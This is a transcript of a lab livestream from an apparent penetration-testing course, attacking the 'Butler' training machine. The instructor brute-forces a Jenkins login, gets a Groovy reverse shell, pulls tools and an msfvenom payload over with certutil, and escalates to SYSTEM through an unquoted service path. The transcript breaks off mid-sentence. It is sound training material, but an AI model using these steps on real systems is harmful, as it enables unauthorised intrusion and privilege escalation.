2 on stream this week, and then we're going to go from there. So we're going to switch over to our handy dandy PowerPoint. Get that going. All right, we are day 17. Day 17, isn't that crazy? We have what, 50 days? So math says we're pretty close to a third of the way there, right? That's pretty good. So here we go. What are we covering? We are covering Capstone of Butler today, and then we're going to do Black Pearl on Friday. Here's your little challenge chat. The username and password today is going to be Butler and Jenkins, just like that. Take a screenshot. I'll put it in chat. You guys should really need to know how to do this because you're going to want to log into your Windows machine. You can thank Joe for this password. Joe Helly is the creator of this box. Thank you, Joe, for creating the box. And while we're at it, I'm actually going to start the attendance. And just to make sure that you actually have this down, what I'm going to be doing here is running the same code for attendance. So I will know that if you submit your attendance, you know this password. If you don't submit your attendance, then you didn't know the password. Look how easy that works out, right? So with that out of the way, let's talk about a couple updates we've got going on, or side notes, I should say. So side note number one is, as you saw, there's a sale running, and we are going to, we're having a $1 sale on the Practical Ethical Hacking course and the Practical Malware Analysis and Triage course, or the PH and PMAT. This is good through Monday. You can use your code $and-a-dream at checkout. Now, please, pretty please, pay attention to your transaction. I'm going to walk you how to check out because we have so many tickets. Look, my bot tried to put it in recession 50. Nice. We have so many tickets coming in saying, I didn't put the coupon code in. The coupon code's right here at the top. All right, right here at the top. We also have a lot of tickets coming in from near the bottom where you guys are selecting the add course voucher because you just check whatever checkbox is around. You check the box and you add that on, and then you charge yourself for another course. Don't just willy-nilly check boxes if you don't know what you're doing. Don't give away your firstborn, okay? Make sure you're reading these things. I would say a ton of our tickets are coming from people checking this box that didn't mean to check this box, or are putting in a coupon code that didn't mean to put didn't put the coupon code in at the top. This is, I could give this to a 5th grader and they can do it. A lot of you, I have no idea what's going on. I love you all, but sometimes you need help, all right? Our help desk team is working overtime. I think we did 80 to 100 tickets yesterday, just from stupid stuff like this. So anyway, other thing is, I saw somebody asking in chat what's going on with the Pnpt. We are switching to an expiring format. Why are we doing this? Well, there are a lot of things that dictate that you need to expire your certification. ANSI is one of them, the Army and Navy COOL program or military COOL program, 8570. There are a lot of accreditation boards that if we want to have this certification in front of as many eyeballs as possible, we need to expire that. On our side of things, we're making the renewal fee $0. All right, $0. So just make sure that you're tracking the updates. We're going to do 40 credits every 3 years. You can do that by doing other courses. You could do that by doing other certifications, by doing Try Hack Me, Hack the Box. It's going to be very easy. If you're working in cybersecurity or you're at all interested in hacking and you stay consistently interested in hacking, renewing your certification will not be difficult. We're trying to make this as easy and accessible as possible. All right. And last but not least, the last day to purchase, we are making this switch on September 1st. All purchases made before September 1st are put on a non-expiring exam voucher. If you intend to take it and you want it to expire, purchase after September 1st, because then that's when it'll expire. These are just purchases. You can take your exam a year or two later if you want, but it has to be purchased before September 1st. Otherwise, we are going to move to the expiring format. All right. If you don't know how to spell Jenkins, by the way, chat, look, This isn't complicated. Is this an I or an L? How would you spell Jenkins? Would you spell it Jenkln? Come on. Come on. Fifth grade. Fifth grade. All right. I love you guys, but fifth grade level here today. All right. So we are at 12:06. I'm going to go ahead and turn off the attendance tracker. If you spell, you spell. If you can't, you can't. I'm so sorry. All right. So get your handy dandy Linux machines ready, and also get your handy dandy Butler machine ready. Okay. And I'm going to log in with the password. To Butler. All right. Butler is the user. Now, my machine just updated, so I'm actually kind of worried that something has broken. My computer shut down, and I wasn't sure why this shut down because I just had loaded it up. Of course, Windows updates, so we'll see how this works out. All right. Okay. So the only thing that we're going to do at the moment is we're going to come in here and run a command. Hopefully. This is why connecting to the internet is a terrible idea. All right. We're going to do ipconfig. Close this. All right. My IP address is 192.168.138.138. All right. So we're going to go ahead and do an nmap scan of that. Same thing as before. I'm just going to change this to 138. Just like that. -A, -P, -T4, and then your IP address. If you're following along, you should not have changed any settings. You should have the autocomplete enabled. Easy change of the last octet of your IP address. And then we're going to let this run. All right. So this might take a few seconds. This is going to be our first Windows machine that we're doing together. You guys should have done Blue on your own. And at this point, we're going to be doing this Windows machine. And then the last one is going to be a Linux machine. Truthfully, chat, Windows machines are very difficult to lab and put in lab environments. That's why a lot of places, like if you see VulnHub, for example, VulnHub is only Linux machines that I'm tracking because of the licensing issues. So I had to actually reinstall this machine and follow along just like I would if I were a student today because my old license expired and it would not connect to the internet because Windows is like that. So all right. If you don't know how to spell Jenkins and you're complaining about that, I'm so sorry, chat. I'm so sorry, chat, but I can't help you with spelling. If you think Jenkins was spelled with an L, you've got your own issues. Love you, chat, but I can only take you so far. All right, we are just taking one more second, chat, and then if this doesn't load, we'll go ahead and just get this started. So what we're going to do is we're going to go ahead and just kind of push this along. I'm not sure why it's taking so long. There's only 2 open ports on this. So one open port that you're going to see on this is going to be a port 8080. So we're going to do 138.138 and then 8080. Just like that. And it should boot up. So you should get a Jenkins screen like this. I'll make this bigger. And the other port that you're going to get is going to be port 7680. So we'll go ahead and knock that out for enumeration purposes. 7680 is a non-traditional port. The response that comes back isn't anything that we're really tracking. So what do we do when we see a non-traditional port that comes up? Well, there's a couple things that we can do. We can try to like netcat to that. We could say like netcat 192.168.138.138, and then do something like 7680 and see if we can get a connection. All right. And we're not getting anything. Let's see if we just do like hello. No, it just automatically closes. So 7680 is really not doing anything for us there. You could also do like a sudo apt install telnet, something like this. We could try to telnet to that as well, and see if that has any connection. So just run that really quick and install telnet. It should take 2 seconds. I'll follow along, but my telnet is already installed. Apparently my password's incorrect though. Let's try that one more time. Okay. So what you're going to want to do is just something like sudo telnet 192.168.138.138 and do 7680. Try to connect there. All right. And let's see, we've got connected. Let's try hello, or we could try like hello. We're not getting anything really here. So we're establishing a three-way connection to that port, but we're not getting anything back. We could also try 192.168.138 and then come in here and try 7680. All right, and nothing's happening there either. So as of right now, let's see if our scan came back. It didn't. What we're going to do is we're just going to enumerate on port 8080. So if we can't find anything, we could try coming back to that 7680. I can tell you it's not a path, but that would be the ways that I would look at that and see what was going on there. So in this instance, we're going to go ahead and take a look at Jenkins. We have a login panel here. I'm going to make this bigger. We have a login panel, and that's really it. So we can take a few different looks at this. Like I might come in here and view the page source. And when I view the page source, I might try to look and see if there's anything in the source that could give us information. Like, is there a version of Jenkins that we're running? Like, can we detect what we're running here? I don't see anything in here for version information. You could do like a control F and try to find like a version as well. I'm not seeing anything there. So in this instance, the source code is not going to do anything for us. We could, in theory, do directory brute forcing and go from there. So I'm just going to tell you that it's a waste of time only because we're on a 1 hour cap limit. I'm not going to do directory brute forcing today. So, but that would be some part of the methodology that we would do. We would say, hey, is there anything lying behind the scenes? Anytime I see a login panel like this, I'm looking at what kind of default credentials might exist. So I might go to Google. If it'll work, go to Google and then just type in something like Jenkins default password or default credentials. And it says a default user of admin with the instance ID as password is created when Jenkins is created. So we don't have a instance ID. So it's going to be just written out once we create this. So you don't have like a default or a true default password for Jenkins. All right. So one of these things is that we don't know at this point. We could check other stuff in here and see if we've got any information or just try to find as much detail about it. But it looks like we're going up against a login panel. So with a login panel, what are some things that we can try? Well, we can try like easily guessable passwords. Like we can come in here and do like admin, for example, and see if that works, or admin Jenkins or something along those lines. We do know that the admin or initial administrator password is admin, so that could be beneficial to us. But really, we're going to have to do some password guessing and password spraying against this login panel. So we're going to do that with Burp Suite. There's actually a built-in Jenkins, I think, brute forcer in Metasploit as well. And something that you can do is you can come to Google and you can look up Jenkins exploit. So that's one thing in the methodology process that we would look up is say, hey, in Jenkins, is there an exploit that's available to us? So we would want to go through and review this. like this Jenkins here, we can look through Jenkins and see what it is, what like types of information we can gather. So there's some unauthenticated enumeration we might be able to perform here. And there's some auxiliary modules, it looks like, built into Metasploit that you could try and search for. You could see if you could find like credentials or usernames or whatever this enumeration is gathering. Login brute forcing, looks like that's built in. Let me make this a little bit bigger. So you've got auxiliary scanner, Jenkins login, something along those lines. We've also got looks like password spraying you can do with different tools as well. They've got a Python script or PowerShell script to do that. And then it also has code execution. So code execution is good. That's really good for us. If we can log in, there's a way to execute code, which means that we might be able to get a reverse shell. This is showing us code execution with the Windows batch command using PowerShell. This is showing us code execution using Groovy as well. So we'll walk through this as we get to it. Looks like there's a Jenkins script console we can use with Metasploit. There's also a post with Metasploit that we can use to gather information. I have seen this in the wild. I have seen this on a pen test. I've seen this one time. It was an internal pen test where they had the Jenkins panel not password protected, but they did have the remote code execution disabled. However, there were still credentials stored within the Jenkins builds. So there's different builds that are in there, and they were doing some test runs. I was able to go pull down those credentials and log into quite a few different accounts that were built off of those Jenkins builds. So something to consider as well. This does have real life application because Jenkins is used in the wild. So with that in mind, we're going to go ahead and try to brute force this. And we're just going to take an easy route today for the sake of time, but I'll walk you through the methodology that we might use in order to do this. So let's go ahead and load up Burp Suite. So you just come up here and type in burp, and you should be able to load up Burp Suite. All right. Next. Start Burp Suite. Okay. And what we're going to do is we're going to make sure our proxy is turned on, which our intercept is turned on. Let me see if I can make this at all bigger. I think it's in project options, maybe. I'm not sure where it's at. I might just have to make this. I've got an idea. Don't worry. So we'll do this kind of back and forth. Let me make sure I'm doing this correctly. So we'll just do something like this. All right, that's pretty. Let me just arrange this a little bit better. So what we're going to do is we're going to make sure our intercept is turned on. And then we're going to go ahead and intercept traffic. So what I want to do is I want to intercept the username and the password that's here. All right. So what we're going to do is we're just going to do like a test. And you're going to want to make sure that your Foxy proxy is turned on to Burp Suite. Remember, we set this up a while ago. If you don't have this set up, then you are maybe behind a little bit. So make sure you have that going and running, and then we're going to sign in, and that should intercept this. And here, this brings us back up. So let's go ahead and intercept. And we could see that we get a username of test, password of test, because that's what I put in. And from here, I'm just going to go ahead and send this to repeater, and I'm going to send this to intruder. So right-click, send to repeater, right-click, send to intruder, or Control-R, Control-I. Let's take a look at repeater first, because I want to show you what this looks like. So in this instance, when we run this test, I want to be able to send this out. I want to issue this request. What happens here is we get a 302, which is a redirect. We get a set cookie, remember me equals. So it's trying to set a cookie, but no cookie is set. And then we can just follow the redirect. But we see here that there's a location login error. So we're gonna go to a login error, and then we're gonna see that we get this 401 unauthorized. All right. So in this case, we're seeing that this is an invalid request. Why are we doing this? What are we trying to figure out? Well, first of all, we're trying to understand what error messaging occurs here, like 401 unauthorized, or hey, this is going to a login error. These are things that when we start getting into more advanced Burp Suite, we can actually say, hey, I want to grep this out and make this a search feature. And I can sort by, like, for example, if I search on login error, I can sort by all the ones that don't have login error. Thus, maybe if there's no checkbox next to it, then there was a successful login. Or I can search by ones maybe that don't have the unauthorized in the response. In that sense, maybe we are authorized at that point, and then we can just filter out which ones are good responses and bad responses. We're going to take a different approach today, only because I want to show you the basics and what we're looking for, and then what little nuances and details you can look for without grepping, and then we'll get more advanced as we go. All right. So now we're going to send this to intruder. You've already done that, but you can also right click in here and send to intruder. Another thing too is with repeater, you could come in here and manually do testing if you wanted to. Like I could say, hey, I want to try a username of test, the password of test1, send that, and then, okay, it's going to follow the redirection. I can do this over and over and over again. It's just very slow. So what intruder does for us is intruder allows us to do some brute forcing and do that based on the positions that we have here. So if we look at the positioning, I'm going to go ahead and just clear this. And I want to make sure that I set a username. So highlight the username of test and hit add. It should turn green like that. Same with the password of test. So we have a few different options in here. Most commonly, I use Sniper, Pitchfork, and Cluster Bomb. Sniper is a one-off kind of attack. So you can think of it like, hey, if I know a valid username, I might just try a bunch of passwords. And that's what Sniper would be. It's a one-off attack. So you would put it like a list of 10 passwords. It would go with the username that you provide it. This wouldn't actually even have a field here. You would only set one field, and then you would go in here and just try 10 different passwords with the same request over and over and over again. All right. So, and it looks like the positions are not set. Let's just pull the screen back for a second. All right. So you got add, clear, auto, and refresh. You're going to want to hit clear over here. Then you're going to want to double click on the word that you want and hit add. All right. Same thing here, add. So, and depending on which burp suite you're using, it will tell you what these are. I'm on an older burp suite. So, okay, let's go back to the big screen. And in here, we're going to go ahead and go to payloads. Actually, before we do that, I'm sorry. We're going to look at using a cluster bomb attack. The other two down here are Pitchfork and Cluster Bomb. So Pitchfork is great for credential stuffing. Like if we select this, if we had a set username to password list, like a 1-to-1 ratio, like I had like, I don't know, Bob, and Bob's password was password 1. We found these maybe on like a leaked credential list or something like that. And then we had Alice, and Alice's password was password 2. This would go down a list of 1-to-1 ratio. So it's great for credential stuffing. But we're going to be using what's called a cluster bomb here, which takes one username, say Bob, and it tries all the passwords in a list. So it might try password 1, password 2, etc. And if we have Alice, well, once it gets through that, it's going to try Alice and say password 1, password 2, etc. All right. So we're going to go ahead and give that a try. I'm just going to delete this. And we're going to add some payloads in here. And another thing that you can watch is the payload count. Because we are on Cluster Bomb, you can multiply the payload times the payload. All right. So if we do 2 usernames and 3 passwords, we should have a 6 request count. Okay. So I'm going to type in some passwords and usernames. We know that admin is a possibility. We know that administrator could be a possibility. And I want to try a username of Jenkins as well. Okay. If we wanted to take this a step further, we could go and search like Google and say, hey, what are common usernames for Jenkins? And we can put those in here. That would be something that maybe we can do. Or if we could do username enumeration, we would put the users that we have in here. The other side of this would be selecting payload set 2 and typing in passwords that you want to perhaps go after. Again, we could use a weak password list. We could use a common Jenkins password list. We have a lot of options available to us with what we want to do here. So I'm just going to type out some passwords. I'm going to type out like password Jenkins. And I'm only showing you the condensed version for the sake of the stream, but the concept and the methodology is here to take and expand upon. All right. Somebody said Hunter 2. Yes, Hunter 2. All right. So now we've got 3 usernames and 5 passwords. What does that mean? We have a request count of 15. That makes sense? One username is going to try all 5. Second username is going to try all 5. Third username is going to try all 5. 15. All right. Can we load a word list? You sure can. You can copy and paste. You can clear this out, paste your own word list if you wanted to. If you have Pro version, they have lists built in as well. So this is the community version. They slow down the intruder attack, so it's a little bit slower. You could use other tools like Zap or Hydra. There's also a tool called Turbo Intruder that you could use that's built into the extender. We're not going to get into all that at this time, but just keep tracking, all right? Okay, it's going to say, hey, this is a demo version. We're going to be intentionally slow. That's fine. I'm going to go ahead and just say okay. And then just move this up a little bit while this runs through. Should just take a second. I'm going to take a drink of my LaCroix. All right. And we should come back here in a second. All right. So what do we see here? We see status of 302 for everything. So when we're looking at brute force attacks, we're looking at a few things. We're looking at the status response because the status response could change. A lot of times we might see an error page that comes back and it's just a 200 response because it automatically put us back to a page that said, hey, login failed. We might see a status change of a 302 to a redirect because we successfully logged in. So looking at status and filtering on status is one item that you can do. Another thing to look at is the length of the payloads. You can see that we have 318, then it drops to 315, then it gets to 408. So we can check and see, okay, well, if I see payload 1 is 318, the chances of this being the same exact thing are probably pretty high. So like as number 2 and number 3, like we can go look at the response and see, hey, this response says 302 found. This one's exactly the same. Doesn't matter what we click through. All right, exactly the same. We do get a change here at 315. So what is the change at 315 that's different from 318? Ah, look at that. See the difference? We get a cookie. We get a JSession ID. What does that mean? That means we likely successfully logged in. Look, we don't have a login error anymore. So if we grepped on that, we would see that this isn't true. That disappears. All right. And we set a cookie. So this changes. And if we look at 408, why did it change again? Well, it's changing because we already have a valid session ID now attached. It's trying to go find another cookie and log in, and we're getting login error. So we're like adding extra bytes to this. We've already had a successful login and found our password, and that password is Jenkins Jenkins. All right. Easy breezy, beautiful cover girl chat. We Gucci. Okay, come in here and try Jenkins Jenkins. If you set your burp proxy off, it might actually load. Step 1 is to understand what you're doing. And I'm going to go ahead and just close out of Burp Suite as well because we no longer need it. Let's try this again. See if we can connect. Okay, now let's try Jenkins. Jenkins. All right. So some of you are asking why were they all 302s? That's just the way the application's built. There's not much we can do about it. All right. So in this instance, everything's a redirect. So we're just following the redirection. Typically, the response code's a 200 or a 302. But in this instance, all responses were redirecting. Okay, so we learned a little bit about exploitation with Jenkins if we have access to a login panel. Okay, so we learned something about a Jenkins reverse shell. I actually think this GitHub Pwn Jenkins is a little bit better of a resource. So if we scroll down, it talks about all the different types of remote code execution that exists, like, hey, CVE 2015-8103 or 2018 or 2019, in different ways that we can attack this and get remote code execution. There's a much easier way if we just scroll down to the bottom. And this talks about, again, like password spraying and other stuff. However, there is a Groovy reverse shell. And the way to go find this, and I'm going to save you some research, is if we came into Jenkins and we went into the build or the manage Jenkins area right here. This would just be a little bit of enumeration on Google. Same concept. I'm just trying to save a little bit of time here. We could come into manage Jenkins and then scroll down and go to the script console. There's also a Jenkins CLI where we can actually access a shell from our platform, which is interesting. If we have shell access, that could lead to something. But the script console will allow us to execute Groovy script and pull down a reverse shell. So this is a very well-known exploit for Jenkins. All right. So in this issue now, we're going to go ahead and copy the reverse shell that's here. So we have this one. Let's copy this and paste it here. And let's talk about what the reverse shell is doing. So this is giving a string host of my IP. So what is your IP address? Well, mine is 192.168.138.140. This is your L host, your listening host. And we also have a port. So this is going to be the port that we're going to get connected on. So I'm going to go ahead and let's take a look here. I'm going to close this and just do a netcat MVLP 1234 because that is what this is saying. We can make this any port number we want. Now this is telling us bin bash. We are running against a Windows machine. At this point, do we know that for sure we're running against a Windows machine? I don't think so, but let's go take a look at the output. Actually, we do. RPC is enabled. This looks like this has changed significantly. I think that my update of Windows likely changed this. So if yours doesn't look like this is absolutely okay. But I am getting SMB signing and I'm getting Windows RPC enabled as well. All right. So in this instance, I'm able to see Windows. If not, we might have to YOLO and try both instances. Okay, so what we're going to do is we're going to go ahead and change this from bin bash because we're not running a Linux exploit. We're running a command.exe. We're running a Windows exploit. And we've got this. The rest of this, all this is saying is, hey, let's go out. Look, socket, host port. This can kind of look familiar. This is written in Groovy, so we haven't like gone through Groovy, but having some code execution or some coding background and history will allow us to understand kind of what's going on here, right? In this instance, we're trying to connect to a port and establish this command.exe. And this is the code to do that. So what we're going to do is we're going to hit run, and hopefully if the page stalls, that's usually a good sign because it's trying to execute code. And you can see here we have now got a reverse shell. All right. So first thing I do when I get into a Windows machine is I'll just type in who am I, similar to Linux, host names, Butler, it looks like. So we're Butler. Okay, perfect. So We're likely not an admin user, meaning we have to do some privilege escalation. Again, we're going to do some basic privilege escalation today. We can type in system info and grab some more information about this computer is something that I would also do. So we might just type in system info and pull down, because I really want to know, like, okay, yeah, I see that we were Windows 10 up at the top there, but I really want to know, like, what are we running? We're running Windows 10 Enterprise Evaluation. So we can go and search this and see if there's exploits for this specific build. We're on build 10.0.19043. We can see if there's anything related to this build that has an exploit for it and that maybe we can do privilege escalation with. That could be interesting. And then we scroll through here and just see what other data is available, what hotfixes are installed, et cetera, et cetera. That gets into more advanced privilege escalation. As of right now, I just want to know what we're running on. We're running on 64-bit Windows 10. All right. And now we're going to go ahead and grab a tool available to us. And that tool is going to be WinPeas, WinPeas. Remember LinPeas? Well, guess what? It's making an appearance again. This time, if you go out and you just search WinPeas, all we need is this bottom one here. You could go to the master of WinPeas, but let's just actually go to the Peas main GitHub right here. And what we're going to do is scroll down just slightly. Over on the right-hand side, there's releases. Releases right here. Okay, we're going to go ahead and click on releases. And we're going to scroll down. We know we're on what? Windows 64-bit. We're going to grab the 64-bit one right here. x64, okay? So download that one. I've already got it downloaded. I'm not going to download it twice. And when we go back in here, what I want you to do is open a new tab. And I want you to move your downloads, whatever it is, winpeas.exe, whatever the file name is. I think it's winpeas64.exe. Remember that transfer folder that we made? I want you to move it to your transfer folder. So just call it winpeas.exe. It's a lot easier that way. All right, move your file to your transfer folder. I'm going to go somewhat quick on these steps because you should know by now how to run a move command. All right, I'm going to cd into my transfer folder. We're going to ls. You can see WinPeas is in here already. All right. So what am I going to do? I want to transfer this file over to Windows. Let's set up Python 3-m HTTP server on port 80. Now we're going to host up the files here, right? On the other side, over here on the next tab, I want to make sure that I can bring that file over. How do we do that with Windows? There's a bunch of different ways. I'm going to show you my favorite one. If you try to do this in a live environment, there's a 50% chance that you will get picked up by detection or antivirus or anything else. I still think it's a pretty cool method because it's already built in. And it's nice and easy for CTF machines. We're not going to work through obfuscation. We're going through the basics again still at this point. All right. Can you use PowerShell? Yes, you can. We're going to use certutil today. All right. So certutil.exe URL cache -f, and we're going to do something like this. I'm going to do 192.168.138/winpeas.exe and call this winpeas.exe. I'm going to leave this up for another 20-30 seconds, and we'll go from there. So go ahead and get this copied. Okay. Let's go ahead and hit enter. Hopefully that brings the file over. Yes. Okay. So my Butler machine died. So the Expired license, I do believe, is a pain in the butt. So you might have your Butler machine die after 30 minutes or so. I'm just going to boot my Butler machine back up real quick. So it looks like we're having some issues there. I'm going to go ahead and, oh, all right. Well, it established connection when I put it back up, but instead what we're going to do is we're just going to grab the shell one more time. Let's go ahead and just do that really quick. We'll run this, see if that works. Might need to refresh this page. Okay, we'll copy the hack tricks one more time. Grab this, paste this in, and I'm going to just call this 192.168.138.140 command.exe. Okay, hopefully we get a shell. We do. All right, so let's run that cert util one more time. Actually, let's ls. It may have brought itself over. Or dir, sorry. I'm in a completely different mindset. It is here. winps.exe is here. I put it in the program file Jenkins folder. I didn't mean to do that. Typically, I'll put this in a users folder. So we'll talk about the user enumeration here in a second as well. But one thing that I like to do is like I'll dir out the users and who they are. And I like to see, okay, who was the last user used on this machine? Well, we see admin or administrator, and we see butler. Obviously, from 2022, it's me doing that. But if it wasn't, I could like also just dir out C users butler, and I could start looking at the files that are on this machine. You should always look at what files are on a machine because there could be something useful. Now, in this instance, I see that there's been a change in the downloads folder back on 8/14/2021, and there was a change in there. So we might want to look and see what the change was. That could be a hint as to what we are going to get ourselves into. Just because there's not a timestamp change doesn't mean there's not anything in documents or desktop or anything, etc. When you're doing privilege escalation, part of your step and methodology should be going through these files and folders to make sure you do your due diligence and you are, you're working through this process. So I'm going to go ahead and just copy this. I'm just going to look a quick dir really quick at documents. So let's take a look at documents just because actually downloads. I'm sorry. There's something in downloads. And we can see there's a wisecare365.exe. We can go research what wisecare365 is, if there's any exploits available to it. Possibly that's running on this machine. At this point, we're going to go ahead and just run winps and kind of take it from there, and then we'll take a look at the rest. So let's do winps.exe. Those of you asking for a Groovy script, all you got to do is go to Google and type in Groovy reverse shell. Groovy reverse shell. That's it. Easy breezy, lemon squeezy. You don't even have to use what I showed you. It's literally Groovy reverse shell. First one. Maybe not. Let's see. Yeah, this is it. So this actually has the command.exe built in. You just change the localhost, change your port to whatever you want, and voila, you are ready to get a shell back. Okay, this could take a minute, so let's scroll back up. And we've got about 15 minutes. I want to make sure I do just, but obviously look at the amount of output that is produced by WinPs. So this can be overwhelming at first to go through. As you get better, you will get, this will be a lot easier to go through, okay? Like as you do this over and over, you kind of know, hey, I could skip over that. That's not important. That's just informational, etc. So we're going to kind of do a little bit of that today. I'll walk you through some of what we're seeing, and then we'll just kind of like hone in on what it is that we see and why it is we're seeing that. So at the very top, if you don't see the pretty colors that we're seeing, you could go cheat a little bit and add this to your machine. You could do a reg add and just add this in, and then you should see color again when you start a new command. But you should be seeing color, but that's just a heads up. All right, so we're coming through again, same thing like LinPs, we're color coordinated. So anything that we see in red is something that could be very interesting to us, and that's what we're going to kind of hone in on today. All right, so it comes through and it tells us a little bit about this machine. Again, Windows 10 Enterprise. We've got the build number. We've got it that it's a virtual machine. Okay, we've got the hotfixes installed. Those could be interesting as well. We can see what information we could pull down, what updates are here. I'm going to keep scrolling through the updates. The updates aren't very important to us right now. System last shutdown date and time for the registry. We don't really need to know that. So I'm going to go ahead and keep moving through. Environmental variables. This could tell us what's installed on this machine and what, like, looks like we got Open SSH, Windows PowerShell. This could be useful as well as we're crafting attacks, though it's not going to directly involve our privilege escalation at this point in time. Okay, Lapse is not installed. Nothing we need to worry about for us, but protection's not installed. Credential guard's not installed. We're not going to get into any of that right now, but it's not useful for this session. As we start to get into more of the Windows materials, we'll start getting into some of that stuff. All right. Drive information. Authenticated users and administrators have all access here. Authenticated users can create directories and append data. Okay, we're an authenticated user, but we're not an administrator, so that wouldn't do anything good for us quite yet. NTLM, we're not going to worry about too much, or any kind of signing or NTLM signing on that. We're going to scroll through. Named pipes. This could be interesting if we were going after like Eternal Blue, something like you saw in Blue, but we're not too interested in named pipes in this situation either. I know I'm going very kind of quickly, kind of high level. I'm just trying to get to the good stuff because we only have a few minutes. Interesting events found. This is just services, SVC hosts. I'm not seeing anything interesting in there. Printing accounts, I'm not going to go over printing right now. Let's go ahead and get through this. With the exploits that have come out since this machine has come out, there may be other ways other than what I'm going to show you to escalate your privileges on this, but we're only going to cover the intended path. But if you find other paths, that's pretty good as well. This gives you a little bit of user information. This shows us that Butler is in the group of administrators. And we've got this here. So maybe we could do something malicious with the user Butler since he is in the administrators and elevate that privilege as well. So something to consider. Current user is Butler. In here, we've got some different token privileges. Something that is very interesting to us would be the SE impersonate privilege. We're not going to worry about that right now, but there are some escalations tied to this impersonate privilege that we will cover later on in the course, including potato attacks, which are pretty fun. All right. So it looks like Butler, again, is an administrator. But we're going to go ahead and elevate our privileges to system through an unquoted service path, which you're going to see here in just a second. Let's go ahead and scroll through this. Okay, service information. This is where you want to be. Service information, all right? So it's saying check if you can overwrite some service binary or perform DLL hijacking. Also check for unquoted paths. This tells you how to escalate services. You can go to this Hacktricks. This Hacktricks website's fantastic, by the way. So we see a Jenkins.exe. The ability is we have permission that we can modify the service. We have all access. But what can we do to abuse this service? Well, we might be able to overwrite something in here like this Jenkins.exe. I don't know because since it is running, if we'll be able to stop that, we are getting our shell from Jenkins.exe. So that might be a dangerous path because what if we shut this down and then we lose access to this machine, then we don't have anything else. It looks like we have an SSH agent as well. We're disabled, stopped, something that we could possibly attack here. VMware, I never go after. It's just the machine services you're running on here. But the last one in here is interesting to us. We see that we have this Wise Boot Assistant. We've got what is called an unquoted service path. It says no quotes and space detected. We can modify this. We have permission to modify. And so the issue is, if you can see here, we have a quote around this path, right? We have a quote here. We have no quote here. We also have a space in here. This is very much what is called an unquoted service path. All right. So when we have no quotes, that means we're not taking the literal path of this. So when this service boots up, what's going to happen is Windows is going to go out and say, well, I'm going to look for cprogram.exe. I'm going to look for cprogramfiles.exe. Every time it sees a space, it's going to keep going through. And I just scrolled down. So sorry. Every time it sees a space, it's going to continue to go through that process. All right. And when it does that, let me see if I can find that back again. When it does that, though, what's going to happen is it's going to look for an executable in each one of those folders until it finds the service that was running. So it's looking for that wise.exe path that's running. If I can find it again. I'm so sorry, chat. Okay. Nope, that's not it. Scroll up just a little bit more. But essentially what we're going to do is we're going to be looking at basically putting a file in a place that we can write to. So we know we can write to this area here, this boottime.exe. We have all access to this service. We should have file write permissions to this folder. What we might want to do is like put a wise.exe in the wise folder, because when it gets to program files or wise, it's looking for wise.exe, because it's going to be looking for this wise.exe right here. All right, so we can manipulate this service path and actually put an executable here and get that to do a reverse shell. All right, so before we do that, let's log in really quick. You don't have to follow along. I'm just going to show you. I just want to show you what this looks like on the other side of things. So if we come in, we log in with our fun Jenkins password that nobody can spell. And we come into our reg. Let's see if it'll work. Maybe. This is asking me for a password. I don't have the password handy, actually. So we won't look at this. I will provide details, but if you go look at once you root the machine, here, I'll send the path to you. Give me 1 second. This is the path, chat. If you go look at the path, you'll see that what we're seeing is the same. There's an image path within this. Actually, you're right. We are admin, aren't we? Let's try running it one more time. I'm off my game today, chat. Let's try with Butler. My bad. All right. So if we go to what I just pasted in chat, HKey computer, HKey local machine. Let's go back. Go to HKey local machine. All right, we're going to go to system. You don't have to follow along. I just want to show you this. All right. We're going to look at the current control set. We're going to look at services. And then we're going to find the Wise Boot Assistant down here. If I can spell, there it is. All right, so this is what it looks like. You see here in the image path, we have no quotes around this. The easy fix to this would just be to quote this. All right, we could quote this and save it. We'd be done. All right, because it's not quoted, we're not taking the literal path, and that's why it's going to go out and do all those checks till it finds the executable running in that service path. Okay, so what's happening is when we run this executable that we're going to put in here, it's going to run as system and elevate our privileges to system. And that's ideally what we want. So in order to do that, we're going to go ahead and generate some malware. I'm going to Control-C right here. And what I want you to do is we're going to use MSF Venom, similar to before. This is the command. I'm not going to type it out just because it's going to make it easier on me. You guys can type this out. I'll even paste this in chat. We are doing a reverse shell on Windows x64 because we know this is a Windows machine running 64-bit Windows. We're going to do a shell reverse TCP. You could, if you wanted to, use Metasploit here. You could do a Meterpreter reverse TCP or reverse shell with Meterpreter, load that up, grab a reverse shell, and have Metasploit access, which is pretty nice. We're doing this the manual method because a lot of you go, oh no, Metasploit, why are we using that? Well, today we'll use manual method. All right, make sure you put your L host in here. My L host is actually going to be 140. Got your L port, your file type, and the file that you're going to be using. Let that generate. We've got 4 minutes, chat. Let's see if we can make this happen. Okay, so that's generated. I'm going to go ahead and just spin up my server again here. Let's see if WinPeas is actually doing anything still. Let's go down to the bottom. It is still at 49%. I'm just going to hit Control-C and back out of this. If yours is still going, that's absolutely fine. You can just kill it. And then I'm going to come back in here, refresh, and get a new shell. Or just run it and get a new shell, hopefully. There we go. Okay, and then what we're going to do is we're going to grab this file. So we want to grab this file. We want to put it into a particular folder. So we want to go into that program files WISE folder. Let's go ahead and CD back one, actually back two. Sorry, back two. So if we dir in here, we should see that we have the program files x86 because that's where it's actually at, not program files. So we can CD into that. And then we can CD into WISE. If we dir in here, this is now our path. We have this WISE care 365. It's going to look for wise.exe. Okay? So we're going to give it a wise.exe in this path. Again, we're unquoted. It's going to do all these checks before it gets to the final executable. So let's go ahead and move our wise.exe over. We're going to do cert util, URL cache, same thing as before, file, do 140. I called this wise.exe. We're going to call this wise.exe. Okay, we've grabbed it. Now, this is called the Wise Boot Assistant. Remember, we saw that earlier. Let's go ahead and just query that. We're going to query the Wise Boot Assistant. You can see that it is running. The process cannot be running. We need to stop the process. Let's go ahead and just stop Wise Boot Assistant. Okay, we're going to do one more query. I always like to just double check. Make sure it's stopped. Okay, you can see now the state is stopped. What else do we need? Well, we gave this a port 7777 reverse shell. Let's go ahead and open up a new tab. Say netcat nvlp 7777. All right. Let's go ahead and start the service. It should go do all those checks we talked about. Okay, now you see we're running as Windows System 32. We'll do a who am I? Host name. We are now authority system, which is the equivalent of root on a Windows machine. We are the total highest level we can be, and we are the owner of this machine now. All right. Easy breezy. At the buzzer, yeah, 1 o'clock. Okay, let's take a look at the, you guys are asking to see it one more time. So we have a stop command here. We're going to service stop the Wise boot assistant, and then you're going to start it again. That's the process. Stop, start. MSF Venom command is right here. Certutil is installed in Windows by default. That is correct, which is why I like using it. There's other things that we can do, other methods. PowerShell is a very common one. PowerShell has a wget or similar method. But in this instance, we're just going to use what's built in with certutil. And again, certutil is not stealthy at all. It will get picked up by 